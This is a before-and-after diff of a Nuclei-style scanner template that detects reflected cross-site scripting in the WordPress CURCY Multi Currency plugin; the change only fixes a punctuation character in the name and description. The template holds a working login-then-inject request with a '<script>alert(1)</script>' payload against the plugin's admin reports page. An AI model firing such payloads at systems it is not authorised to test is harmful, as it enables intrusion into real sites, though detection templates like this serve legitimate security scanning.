vulnerabilities/wordpress/curcy-xss.yaml (before)
id: curcy-xss

info:
  name: WordPress CURCY ? Multi Currency for WooCommerce <2.1.18 - Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: WordPress CURCY ? Multi Currency for WooCommerce 2.1.18 does not escape some generated URLs before outputting them back in attributes, leading to reflected cross-site scripting.
  reference:
    - https://wpscan.com/vulnerability/6ebafb52-e167-40bc-a86c-b9840b2b9b37
    - https://wordpress.org/plugins/woo-multi-currency
  metadata:
    verified: true
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: wp-plugin,xss,wp,wordpress,authenticated,curcy,wpscan

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin.php?page=wc-reports&a"><script>alert(1)</script> HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'wc-reports&a\"><script>alert(1)</script>">All'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/07

vulnerabilities/wordpress/curcy-xss.yaml (after)
id: curcy-xss

info:
  name: WordPress CURCY - Multi Currency for WooCommerce <2.1.18 - Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: WordPress CURCY - Multi Currency for WooCommerce 2.1.18 does not escape some generated URLs before outputting them back in attributes, leading to reflected cross-site scripting.
  reference:
    - https://wpscan.com/vulnerability/6ebafb52-e167-40bc-a86c-b9840b2b9b37
    - https://wordpress.org/plugins/woo-multi-currency
  metadata:
    verified: true
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: wp-plugin,xss,wp,wordpress,authenticated,curcy,wpscan

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin.php?page=wc-reports&a"><script>alert(1)</script> HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'wc-reports&a\"><script>alert(1)</script>">All'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/07

vulnerabilities/wordpress/curcy-xss.yaml (diff)
@@ -1,10 +1,10 @@
 id: curcy-xss
 
 info:
-  name: WordPress CURCY ? Multi Currency for WooCommerce <2.1.18 - Cross-Site Scripting
+  name: WordPress CURCY - Multi Currency for WooCommerce <2.1.18 - Cross-Site Scripting
   author: Akincibor
   severity: medium
-  description: WordPress CURCY ? Multi Currency for WooCommerce 2.1.18 does not escape some generated URLs before outputting them back in attributes, leading to reflected cross-site scripting.
+  description: WordPress CURCY - Multi Currency for WooCommerce 2.1.18 does not escape some generated URLs before outputting them back in attributes, leading to reflected cross-site scripting.
   reference:
     - https://wpscan.com/vulnerability/6ebafb52-e167-40bc-a86c-b9840b2b9b37
     - https://wordpress.org/plugins/woo-multi-currency
